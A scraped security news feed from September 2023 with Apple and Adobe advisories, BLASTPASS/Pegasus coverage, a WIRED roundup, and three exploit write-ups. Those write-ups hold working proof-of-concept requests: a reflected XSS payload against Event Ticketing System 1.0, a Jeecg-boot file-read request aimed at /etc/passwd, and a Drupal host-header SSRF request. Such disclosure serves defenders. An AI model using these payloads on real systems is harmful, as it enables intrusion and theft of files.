Apple Security Advisory 2023-09-07-1 - macOS Ventura 13.5.2 addresses buffer overflow and code execution vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

APPLE-SA-2023-09-07-1 macOS Ventura 13.5.2

macOS Ventura 13.5.2 addresses the following issues.  
Information about the security content is also available at  
https://support.apple.com/kb/HT213906.

Apple maintains a Security Updates page at  
https://support.apple.com/HT201222 which lists recent  
software updates with security advisories.

ImageIO  
Available for: macOS Ventura  
Impact: Processing a maliciously crafted image may lead to arbitrary  
code execution. Apple is aware of a report that this issue may have been  
actively exploited.  
Description: A buffer overflow issue was addressed with improved memory  
handling.  
CVE-2023-41064: The Citizen Lab at The University of Torontoʼs Munk  
School

macOS Ventura 13.5.2 may be obtained from the Mac App Store or  
Apple's Software Downloads web site:  
https://support.apple.com/downloads/  
All information is also posted on the Apple Security Updates  
web site: https://support.apple.com/en-us/HT201222.

This message is signed with Apple's Product Security PGP key,  
and details are available at:  
https://www.apple.com/support/security/pgp/  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEsz9altA7uTI+rE/qX+5d1TXaIvoFAmT6SZYACgkQX+5d1TXa  
IvrtMhAA1RyQ10AXiFZtsQ98AyilJb114zyas7gNMA64LRqAFXU5stooAnZ553uu  
YSsVUpUCkMGNppha3i/bGUiEMBRpkBugHq288eFJEP6bS/wpL5PKhZKoNl7qcuIv  
nWj9T4x3qq4e6d7TbXSMXVdiSpBSvlsTcxpjk+VcUNcE6bqcgwvswtNWfN2ADCu7  
cwtYDznY3rgaYRSTwfZj/AfS378STrhUDfY55PSuy8Kx4lCwPfADNuLI4CeXZNyc  
Cb7bAd0RJWqrM/LHhq3C/hNxaSQOv4WE3kRbwfeLmYOidhFkZLBryhKkJ/XYTUWi  
WZfHthSPV6gVN8pwrBPslfrWWFS4V/mJMR89TZounTLJbzok7el5H8JNxK6FTymz  
9BIhR9JJKAi58HwGAYMFfrb4HSdUraPKE64qJT6OSEIJLlkDOAFZfmh6C4G0RWcf  
XySsm4w+ABax3YxfzK0IOE9/a8Gib1e0hD+ZnpqcldTvPLiw6ZqqpY4JJbaO8IoT  
5HY03lRMp+eJmw9dVthtzc3p8tUvll/RLe2+anE1ATktdGLJz1Uvosz2+4ee13jx  
nvq5ALYoaqah/XrYXF53eHUfCliGWWbjDE/MrcakfGZ4nqVOy021Id3g5bsb5NlS  
6U4EWi7pAcfqv8TK95YAIDXiSCicKuZsYokYlRL9AAvgerBCw1U=  
=xKgX  
-----END PGP SIGNATURE-----

Apple Security Advisory 2023-09-07-1

Adobe Acrobat Reader versions 2019.021.20056 and earlier are affected by a Stack-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

Security update available for Adobe Acrobat and Reader | APSB19-55

**Bulletin ID**

**Date Published**

**Priority**

APSB19-55

December 10, 2019

2

Adobe has released security updates for Adobe Acrobat and Reader for Windows and macOS. These updates address critical and  important vulnerabilities.  Successful exploitation could lead to arbitrary code execution in the context of the current user.    

Adobe recommends users update their software installations to the latest versions by following the instructions below.    

The latest product versions are available to end users via one of the following methods:    

*   Users can update their product installations manually by choosing Help > Check for Updates.     
    
*   The products will update automatically, without requiring user intervention, when updates are detected.      
    
*   The full Acrobat Reader installer can be downloaded from the Acrobat Reader Download Center.     
    

For IT administrators (managed environments):     

*   Download the enterprise installers from ftp://ftp.adobe.com/pub/adobe/, or refer to the specific release note version for links to installers.     
    
*   Install updates via your preferred methodology, such as AIP-GPO, bootstrapper, SCUP/SCCM (Windows), or on macOS, Apple Remote Desktop and SSH.     
    

Adobe categorizes these updates with the following priority ratings and recommends users update their installation to the newest version:    

**Vulnerability Category**

**Vulnerability Impact**

**Severity**

**CVE Number**

Out-of-Bounds Read  

Information Disclosure  

Important   

CVE-2019-16449  

CVE-2019-16456

CVE-2019-16457

CVE-2019-16458

CVE-2019-16461

CVE-2019-16465

Out-of-Bounds Write 

Arbitrary Code Execution   

Critical

CVE-2019-16450

CVE-2019-16454

Use After Free   

Arbitrary Code Execution     

Critical

CVE-2019-16445

CVE-2019-16448

CVE-2019-16452

CVE-2019-16459

CVE-2019-16464

CVE-2019-16471  

Heap Overflow 

Arbitrary Code Execution     

Critical

CVE-2019-16451

Buffer Error

Arbitrary Code Execution     

Critical

CVE-2019-16462

CVE-2019-16470  

Untrusted Pointer Dereference

Arbitrary Code Execution 

Critical

CVE-2019-16446

CVE-2019-16455

CVE-2019-16460

CVE-2019-16463

Binary Planting (default folder privilege escalation) 

Privilege Escalation

Important 

CVE-2019-16444

Security Bypass

Arbitrary Code Execution

Critical

CVE-2019-16453

Adobe would like to thank the following individuals and organizations for reporting the relevant issues and for working with Adobe to help protect our customers:    

*   Mateusz Jurczyk of Google Project Zero & Anonymous working with Trend Micro Zero Day Initiative (CVE-2019-16451)
*   Honc (章哲瑜) (CVE-2019-16444) 
*   Ke Liu of Tencent Security Xuanwu Lab. (CVE-2019-16445, CVE-2019-16449, CVE-2019-16450, CVE-2019-16454, CVE-2019-16471)
*   Sung Ta (@Mipu94) of SEFCOM Lab, Arizona State University (CVE-2019-16446, CVE-2019-16448) 
*   Aleksandar Nikolic of Cisco Talos (CVE-2019-16463)
*   Technical support team of HTBLA Leonding (CVE-2019-16453) 
*   Haikuo Xie of Baidu Security Lab (CVE-2019-16461)
*   Bit of STAR Labs (CVE-2019-16452) 
*   Xinyu Wan and Yiwei Zhang from Renmin University of China (CVE-2019-16455, CVE-2019-16460, CVE-2019-16462)
*   Bo Qu of Palo Alto Networks and Heige of Knownsec 404 Security Team (CVE-2019-16456) 
*   Zhibin Zhang of Palo Alto Networks (CVE-2019-16457)
*   Qi Deng, Ken Hsu of Palo Alto Networks (CVE-2019-16458) 
*   Lexuan Sun, Hao Cai of Palo Alto Networks (CVE-2019-16459)
*   Yue Guan, Haozhe Zhang of Palo Alto Networks (CVE-2019-16464) 
*   Hui Gao of Palo Alto networks (CVE-2019-16465)
*   Zhibin Zhang, Yue Guan of Palo Alto Networks (CVE-2019-16465)
*   Zhangqing and Zhiyuan Wang from cdsrc of Qihoo 360 (CVE-2019-16470)

March 26, 2020: Added acknowledgement for CVE-2019-16471, CVE-2019-16470

.

CVE-2019-16470: Adobe Security Bulletin

Categories: Podcast
This week on Lock and Code, we revisit an earlier conversation with a Bay Area teenager about the hardest parts about growing up online. 



(Read more...)




The post Re-air: What teenagers face growing up online: Lock and Code S04E19 appeared first on Malwarebytes Labs.

Posted: September 11, 2023 by

_This week on the Lock and Code podcast..._

In 2022, Malwarebytes investigated the blurry, shifting idea of “identity” on the internet, and how online identities are not only shaped by the people behind them, but also inherited by the internet’s youngest users, children. Children have always inherited some of their identities from their parents—consider that two of the largest indicators for political and religious affiliation in the US are, no surprise, the political and religious affiliations of someone’s parents—but the transfer of _online_ identity poses unique risks.  

When parents create email accounts for their kids, do they also teach their children about strong passwords? When parents post photos of their children online, do they also teach their children about the safest ways to post photos of themselves and others? When parents create a Netflix viewing profile on a child's iPad, are they prepared for what else a child might see online? Are parents certain that a kid is ready to _watch_ before they can _walk_?

Those types of questions drove a joint report that Malwarebytes published last year, based on a survey of 2,000 people in North America. That research showed that, broadly, not enough children and teenagers trust their parents to support them online, and not enough parents know exactly how to give the support their children need.

But stats and figures can only tell so much of the story, which is why last year, Lock and Code host David Ruiz spoke with a Bay Area high school graduate about her own thoughts on the difficulties of growing up online. Lock and Code is re-airing that episode this week because, in less than one month, Malwarebytes is releasing a follow-on report about behaviors, beliefs, and blunders in online privacy and cybersecurity. And as part of that follow-on report, Lock and Code is speaking again with the guest brought on last year, Nitya Sharma. 

Before our follow-on report releases, we are sharing with listeners our prior episode that aired in 2022 about the difficulties that an everyday teenager faces online, including managing her time online, trying to meet friends and complete homework, the traps of trading online interaction with in-person socializing, and what she would do differently with her children, if she ever started a family, in preparing them for the Internet.

Tune in today. 

You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use. 

_Show notes and credits:_

Intro Music: “Spellbound” by Kevin MacLeod (incompetech.com)  
Licensed under Creative Commons: By Attribution 4.0 License  
http://creativecommons.org/licenses/by/4.0/  
Outro Music: “Good God” by Wowa (unminus.com)

**RELATED ARTICLES**

Re-air: What teenagers face growing up online: Lock and Code S04E19

Plus: Apple patches newly discovered flaws exploited by NSO Group spyware, North Korean hackers target security researchers, and more.

Last week, WIRED published a deep-dive investigation into Trickbot, the prolific Russian ransomware gang. This week, US and UK authorities sanctioned 11 alleged members of Trickbot and its related group, Conti, including Maksim Galochkin, aka Bentley, one of the alleged members whose real-world identity we confirmed through our investigation. Coincidence? Maybe. Either way, it's a big deal.

In addition to the US and UK sanctions, the US Justice Department also unsealed indictments filed in three US federal courts against Galochkin and eight other alleged Trickbot members for ransomware attacks against entities in Ohio, Tennessee, and California. Because everyone charged is a Russian national, however, it is unlikely they will ever be arrested or face trial.

While Russian cybercriminals typically enjoy immunity, the same may not remain true for the country’s military hackers. The lead prosecutor of the International Criminal Court (ICC) says the ICC will begin pursuing charges for cyber war crimes. The prosecutor, Karim Khan, did not name Russia, but the move follows a formal petition from the Human Rights Center at UC Berkeley’s School of Law asking the ICC to prosecute Russia’s Sandworm hackers for war crimes. Part of Russia’s GRU military intelligence agency, Sandworm is responsible for causing blackouts in Ukraine, the only known instances of cyberattacks shutting down an electrical grid. Sandworm also released the NotPetya malware against Ukraine, which ultimately spread globally and caused an unprecedented $10 billion in damages worldwide.

Russia is far from the only country that engages in offensive cyberwar tactics. China-backed hackers have repeatedly targeted the US and other countries, and they may be getting some help finding unpatched vulnerabilities. A Chinese law passed in 2022 demands that any network technology company operating in the country share details about vulnerabilities in its products with the Chinese government within two days of their discovery. Information about these vulnerabilities may then be shared with China’s hackers. It’s unclear how many Western companies comply with the law or provide enough information to allow Chinese hackers to exploit the products’ flaws.

Speaking of Chinese hackers, Microsoft this week finally explained how China’s state-sponsored hackers managed to steal a cryptographic key that allowed the attackers to successfully access the Outlook email accounts of at least 25 organizations, including US government agencies. According to Microsoft, the hackers broke into the account of a company engineer using token-stealing malware. They then used that account to access a cache of crash data that accidentally contained the signing key they then stole and used to go on an Outlook hacking spree. None of this was supposed to be possible, and Microsoft says it has corrected several flaws in its systems that allowed the attack to happen.

Before he died in a mysterious plane crash last month following an attempted coup against Russian president Vladimir Putin, Yevgeny Prigozhin wasn’t just the leader of the Wagner Group mercenaries. He was also the head of the notorious Internet Research Agency (IRA), a Russian outfit responsible for widespread disinformation campaigns. While the IRA was reportedly shut down, new research shows that pro-Prigozhin trolls continue to push his agenda. Many of the accounts spreading disinformation on X (formerly Twitter) have been banned. But since when has that stopped them?

Elsewhere, we explained how prompt injection attacks against generative AI chatbots like ChatGPT take advantage of a flaw that’s difficult to fix. We detailed how hard it is to opt out of allowing Facebook to use your data to train its AI. We have a rundown on Proton Sentinel, a suite of tools that are similar to Google’s offerings but with a strong emphasis on privacy and security. We also co-published a story with The Markup into Axon’s quest to build Taser-armed drones. And we got the inside scoop on a meeting between top US spies and civil liberties groups over Section 702 of the Foreign Surveillance Intelligence Act, which is set to expire at the end of the year.

But that’s not all. Each week, we round up the security and privacy news we didn’t cover in depth ourselves. Click the headlines to read the full stories. And stay safe out there.

Car companies are collecting and selling extremely detailed personal data from drivers who have no real way to opt out, a new report from the Mozilla Foundation found. Researchers spent hundreds of hours studying 25 privacy policies for major car brands and found that none of them met the foundation’s minimum standards around privacy and security.

According to the report, modern cars, stuffed to the roof with sensors, collect more information about you than just about any other product in your life. They know where you go, what you say, and how you move your body. Nissan’s privacy policy, for example, allows the company to collect and share drivers’ sexual activity, health diagnosis data, and genetic information, according to the report.

Eighty-four percent of the brands that researchers studied share or sell this kind of personal data, and only two of them allow drivers to have their data deleted. While it is unclear exactly who these companies share or sell data to, the report points out that there is a huge market for driver data. An automotive data broker called High Mobility cited in the report has a partnership with nine of the car brands Mozilla studied. On its website, it advertises a wide range of data products—including precise location data.

This isn’t just a privacy nightmare but a security one. Volkswagen, Toyota, and Mercedes-Benz have all recently suffered data leaks or breaches that affected millions of customers. According to Mozilla, cars are the worst category of products for privacy that they have ever reviewed.

Apple has just released a security update to iOS after researchers at Citizen Lab discovered a zero-click vulnerability being used to deliver Pegasus spyware. Citizen Lab, which is part of the University of Toronto, is calling the newly discovered exploit chain Blastpass. Researchers say it is capable of compromising iPhones running the latest version of iOS (16.6) without the target even touching their device. According to researchers, Blastpass is delivered to a victim’s phone through an iMessage with an Apple Wallet attachment containing a malicious image.

The Pegasus spyware, developed by NSO Group, enables an attacker to read a target’s text messages, view their photos, and listen to calls. It has been used to track journalists, political dissidents, and human rights activists around the world.

Apple says customers should update their phones to the newly released iOS 16.6.1. The exploit can also attack certain models of iPads. You can see details of the affected models here. Citizen Lab urges at-risk users to enable Lockdown Mode.

North Korea-backed hackers are targeting cybersecurity researchers in a new campaign that is exploiting at least one zero-day vulnerability, Google’s Threat Analysis Group (TAG) warned in a report released Thursday. The group did not provide details about the vulnerability since it is currently unpatched. However, the company says it is part of a popular software package used by security researchers.

According to TAG, the current attack mirrors a January 2021 campaign that similarly targeted security researchers working on vulnerability research and development. Like the previous campaign, North Korean threat actors send researchers malicious files after first spending weeks establishing a relationship with their target. According to the report, the malicious file will execute “a series of anti-virtual machine checks” and send collected information—along with a screenshot—back to the attacker.

In order to shield prospective jurors from harassment, District Attorney Fani Willis asked the judge in Donald Trump’s racketeering trial to prevent people from capturing or distributing any sort of image or identifying information about them. The motion, filed in Fulton County Superior Court on Wednesday, revealed that immediately after the indictment was filed, anonymous individuals on “conspiracy theory websites" had shared the full names, ages, and addresses of 23 grand jurors with “the intent to harass and intimidate them.”

Willis also revealed that she had been the victim of doxxing when the personal information of her and her family—including their physical addresses and “GPS coordinates”—was posted on an unnamed website hosted by a Russian company. Willis, who is Black, had previously disclosed that she faced racist and violent threats after the announcement of her investigation into the former president.

Mozilla: Your New Car Is a Data Privacy Nightmare

Event Ticketing System version 1.0 suffers from a cross site scripting vulnerability.

    ## Title: Event Ticketing System-1.0 XSS-Reflected - RCE## Author: nu11secur1ty## Date: 09/08/2023## Vendor: https://www.phpjabbers.com/## Software: https://www.phpjabbers.com/event-ticketing-system/#sectionDemo## Reference: https://portswigger.net/web-security/cross-site-scripting/reflected## Description:The value of the `id` request parameter is copied into the value of anHTML tag attribute which is encapsulated in double quotation marks.The payload }}uypja"><script>alert(1)</script>k36c0 was submitted inthe id parameter. This input was echoed asuypja"><script>alert(1)</script>k36c0 in the application's response.The attacker can use this vulnerability to trick the user intoexecuting - opening the browser on his machine and opening a hazardousURL address.STATUS: HIGH Vulnerability[+]Testing Payload:```GETGET /1694154671_204/index.php?controller=pjFront&action=pjActionCheckout&locale=1&id=1hau48%22%3e%3cscript%3ealert(1)%3c%2fscript%3exoplmHTTP/1.1Host: demo.phpjabbers.comAccept-Encoding: gzip, deflateAccept: */*Accept-Language: en-US;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.141Safari/537.36Connection: closeCache-Control: max-age=0Cookie: EventTicketing=lirq5h64gv5dj0utbp2r5nsqf7Origin: http://demo.phpjabbers.comReferer: http://demo.phpjabbers.com/Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Event-Ticketing-System-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/09/event-ticketing-system-10-xss-reflected.html)## Time spent:01:25:00

Event Ticketing System 1.0 Cross Site Scripting

Jeecg boot up to v3.5.3 was discovered to contain an arbitrary file read vulnerability via the interface /testConnection.

In the /testConnection route, a MySQL connection can be constructed to cause arbitrary file reading.

@PostMapping({"/testConnection"})
    public Result a(@RequestBody JmreportDynamicDataSourceVo var1) {
        Connection var2 = null;
        String var3 = var1.toString();
        a.info(" local cache key: " + var3);
        Object var4 = this.localCache.a(var3);
        if (g.d(var4)) {
            int var5 = g.e(var4);
            a.info(" local cache value: " + var5);
            if (var5 >= 3) {
                return Result.error("数据源已连接错误3次以上,请检查配置信息！");
            }

            if (var5 == 0) {
                return Result.OK("数据库连接成功", true);
            }
        } else {
            this.localCache.a(var3, 0, 3600000L);
        }

        try {
            Result var6;
            try {
                String var37 = var1.getDbType();
                Result var40;
                if (this.jmReportDbSourceService.isHave(d.cI, var37)) {
                    boolean var39 = this.jmreportNoSqlService.testConnection(var1);
                    if (var39) {
                        var40 = Result.OK("数据库连接成功", true);
                        return var40;
                    } else {
                        this.localCache.a(var3, 1);
                        var40 = Result.error("数据库连接失败：错误未知");
                        return var40;
                    }
                } else {
                    Class.forName(var1.getDbDriver());
                    DriverManager.setLoginTimeout(60);
                    String var38 = org.jeecg.modules.jmreport.dyndb.util.b.g(var1.getDbUrl());
                    var2 = DriverManager.getConnection(var38, var1.getDbUsername(), var1.getDbPassword());
                    if (var2 == null) {
                        this.localCache.a(var3, 1);
                        var40 = Result.OK("数据库连接失败：错误未知", true);
                        return var40;

There is protection during the parsing process.

    public static String g(String var0) {
        if (a(var0, "mysql")) {
            if (var0.indexOf("allowLoadLocalInfile") > 0) {
                var0 = var0.replaceAll("(?i)allowLoadLocalInfile=true", "allowLoadLocalInfile=false");
            } else {
                var0 = var0 + "&allowLoadLocalInfile=false";
            }
        }

we can bypass it

POST /jeecg-boot/jmreport/testConnection HTTP/1.1
Host: 127.0.0.1:8080
Content-Length: 0
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

{
    "id":"1",
    "code":"select \* from information\_schema.tables",
    "dbType":"jndi",
    "dbDriver":"com.mysql.cj.jdbc.Driver",
    "dbUrl":"jdbc:mysql://localhost:3307/test?allowLoadLocalInfile=yes",
    "dbName":"information\_schema",
    "dbUsername":"fileread\_/etc/passwd",
    "dbPassword":"password",
    "connectionTimaes":"5"
}

CVE-2023-41578: Jeecg-boot <=3.5.3 Arbitrary File Read · Issue #1 · Snakinya/Bugs

Drupal version 10.1.2 appears to suffer from web cache poisoning due to a server-side request forgery vulnerability.

    ## Title: drupal-10.1.2 web-cache-poisoning-External-service-interaction## Author: nu11secur1ty## Date: 08/30/2023## Vendor: https://www.drupal.org/## Software: https://www.drupal.org/download## Reference: https://portswigger.net/kb/issues/00300210_external-service-interaction-http## Description:It is possible to induce the application to perform server-side HTTPrequests to arbitrary domains.The payload d7lkti6pq8fjkx12ikwvye34ovuoie680wqjg75.oastify.com wassubmitted in the HTTP Host header.The application performed an HTTP request to the specified domain. Forthe second test, the attacker stored a responseon the server with malicious content. This can be bad for a lot ofusers of this system if the attacker spreads a malicious URLand sends it by email etc. By using a redirect exploit.STATUS: HIGH-Vulnerability[+]Exploit:```GETGET /drupal/web/?psp4hw87ev=1 HTTP/1.1Host: d7lkti6pq8fjkx12ikwvye34ovuoie680wqjg75.oastify.comAccept-Encoding: gzip, deflate, psp4hw87evAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7,text/psp4hw87evAccept-Language: en-US,psp4hw87ev;q=0.9,en;q=0.8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111Safari/537.36 psp4hw87evConnection: closeCache-Control: max-age=0Upgrade-Insecure-Requests: 1Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"Sec-CH-UA-Platform: WindowsSec-CH-UA-Mobile: ?0Origin: https://psp4hw87ev.pwnedhost.com```[+]Response from Burpcollaborator server:```HTTPHTTP/1.1 200 OKServer: Burp Collaborator https://burpcollaborator.net/X-Collaborator-Version: 4Content-Type: text/htmlContent-Length: 62<html><body>zeq5zcbz3x69x9a63ubxidzjlgigmmgifigz</body></html>```[+]Response from Attacker server```HTTP192.168.100.45 - - [30/Aug/2023 05:52:56] "GET/drupal/web/rss.xml?psp4hw87ev=1 HTTP/1.1"```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/DRUPAL/2013/drupal-10.1.2)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/08/drupal-1012-web-cache-poisoning.html)## Time spend:03:35:00

Drupal 10.1.2 Web Cache Poisoning

Apple on Thursday released emergency security updates for iOS, iPadOS, macOS, and watchOS to address two zero-day flaws that have been exploited in the wild to deliver NSO Group's Pegasus mercenary spyware.
The issues are described as below -

CVE-2023-41061 - A validation issue in Wallet that could result in arbitrary code execution when handling a maliciously crafted attachment.
CVE-2023-41064

Apple on Thursday released emergency security updates for iOS, iPadOS, macOS, and watchOS to address two zero-day flaws that have been exploited in the wild to deliver NSO Group's Pegasus mercenary spyware.

The issues are described as below -

*   **CVE-2023-41061** - A validation issue in Wallet that could result in arbitrary code execution when handling a maliciously crafted attachment.
*   **CVE-2023-41064** - A buffer overflow issue in the Image I/O component that could result in arbitrary code execution when processing a maliciously crafted image.

While CVE-2023-41064 was found by the Citizen Lab at the University of Torontoʼs Munk School, CVE-2023-41061 was discovered internally by Apple, with "assistance" from the Citizen Lab.

The updates are available for the following devices and operating systems -

*   **iOS 16.6.1 and iPadOS 16.6.1** - iPhone 8 and later, iPad Pro (all models), iPad Air 3rd generation and later, iPad 5th generation and later, and iPad mini 5th generation and later
*   **macOS Ventura 13.5.2** - macOS devices running macOS Ventura
*   **watchOS 9.6.2** - Apple Watch Series 4 and later

In a separate alert, Citizen Lab revealed that the twin flaws have been weaponized as part of a zero-click iMessage exploit chain named BLASTPASS to deploy Pegasus on fully-patched iPhones running iOS 16.6.

"The exploit chain was capable of compromising iPhones running the latest version of iOS (16.6) without any interaction from the victim," the interdisciplinary laboratory said. "The exploit involved PassKit attachments containing malicious images sent from an attacker iMessage account to the victim."

Additional technical specifics about the shortcomings have been withheld in light of active exploitation. That said, the exploit is said to bypass the BlastDoor sandbox framework set up by Apple to mitigate zero-click attacks.

"This latest find shows once again that civil society is targeted by highly sophisticated exploits and mercenary spyware," Citizen Lab said, adding the issues were found last week when examining the device of an unidentified individual employed by a Washington D.C.-based civil society organization with international offices.

UPCOMING WEBINAR

Way Too Vulnerable: Uncovering the State of the Identity Attack Surface

Achieved MFA? PAM? Service account protection? Find out how well-equipped your organization truly is against identity threats

Supercharge Your Skills

Cupertino has so far fixed a total of 13 zero-day bugs in its software since the start of the year. The latest updates also arrive more than a month after the company shipped fixes for an actively exploited kernel flaw (CVE-2023-38606).

News of the zero-days comes as the Chinese government is believed to have ordered a ban prohibiting central and state government officials from using iPhones and other foreign-branded devices for work in an attempt to reduce reliance on overseas technology and amid an escalating Sino-U.S. trade war.

"The real reason \[for the ban\] is: cybersecurity (surprise surprise)," Zuk Avraham, security researcher and founder of Zimperium, said in a post on X. "iPhones have an image of being the most secure phone... but in reality, iPhones are not safe at all against simple espionage."

"Don't believe me? Just look at the number of 0-clicks commercial companies like NSO had over the years to understand that there is almost nothing an individual, an organization, or a government can do to protect itself against cyber espionage via iPhones."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Apple Rushes to Patch Zero-Day Flaws Exploited for Pegasus Spyware on iPhones

By Waqas
If you are using an iPhone, it is time to update it to the latest version RIGHT NOW!
This is a post from HackRead.com Read the original post: Update NOW! Pegasus Spyware Exploit Found in iPhones Running Latest iOS

**Apple issues an urgent security update as the Pegasus spyware exploit is found targeting iPhones without any user interaction.**

Apple has issued an urgent security update to fix a zero-click vulnerability that was being used to deliver NSO Group’s Pegasus spyware to iPhones.

The vulnerability, which was discovered by Citizen Lab, is known as BLASTPASS. It allows attackers to compromise iPhones running the latest version of iOS (16.6) without any interaction from the victim.

The exploit involves PassKit attachments containing malicious images sent from an attacker’s iMessage account to the victim. When the victim opens the attachment, the malicious code is executed and the device is infected with Pegasus spyware.

Pegasus is a powerful spyware that can be used to track a victim’s location, record their calls and messages, and even access their camera and microphone. It has been used by governments to target journalists, activists, and political opponents.

Apple has released a security update that fixes the BLASTPASS vulnerability. The update is available for all iPhones running iOS 16.6 and later.

In a blog post, Citizen Lab also urged users to enable Lockdown Mode, a new feature that provides additional security protections for users who may be at risk of targeted attacks. Lockdown Mode disables a number of features on the iPhone, including iMessage attachments, wired connections, and Face ID authentication with unknown devices.

Citizen Lab on X (Twitter)

The BLASTPASS vulnerability is a serious security issue, but Apple’s quick response and patch cycle should help to protect users. The discovery of the vulnerability also highlights the importance of supporting civil society organizations, which often play a vital role in identifying and exposing these types of threats.

Here are some additional tips for protecting your iPhone from malware and other cyberattacks:

*   Keep your software up to date.
*   Only download apps from trusted sources.
*   Use a strong password and enable two-factor authentication.
*   Be careful about what links you click on and what files you open.
*   Be suspicious of any emails or messages that ask for personal information.

1.  QuaDream: Israeli Cyber Mercenary Behind iPhone Hacks
2.  Israeli spyware used in hacking phones of journalists globally
3.  Android Version of Sophisticated Pegasus Spyware Discovered
4.  Israeli Spyware Vendor Uses Chrome 0day to Target Journalists
5.  European Spyware Vendor Offering Android and iOS Device Exploits

Update NOW! Pegasus Spyware Exploit Found in iPhones Running Latest iOS

A buffer overflow issue was addressed with improved memory handling. This issue is fixed in macOS Ventura 13.5.2, iOS 16.6.1 and iPadOS 16.6.1. Processing a maliciously crafted image may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.

This document describes the security content of macOS Ventura 13.5.2.

**About Apple security updates**

For our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the Apple security releases page.

Apple security documents reference vulnerabilities by CVE-ID when possible.

For more information about security, see the Apple Product Security page.

**macOS Ventura 13.5.2**

Released September 7, 2023

**ImageIO**

Available for: macOS Ventura

Impact: Processing a maliciously crafted image may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.

Description: A buffer overflow issue was addressed with improved memory handling.

CVE-2023-41064: The Citizen Lab at The University of Torontoʼs Munk School

Information about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. Contact the vendor for additional information.

Published Date: September 07, 2023

Tag

#apple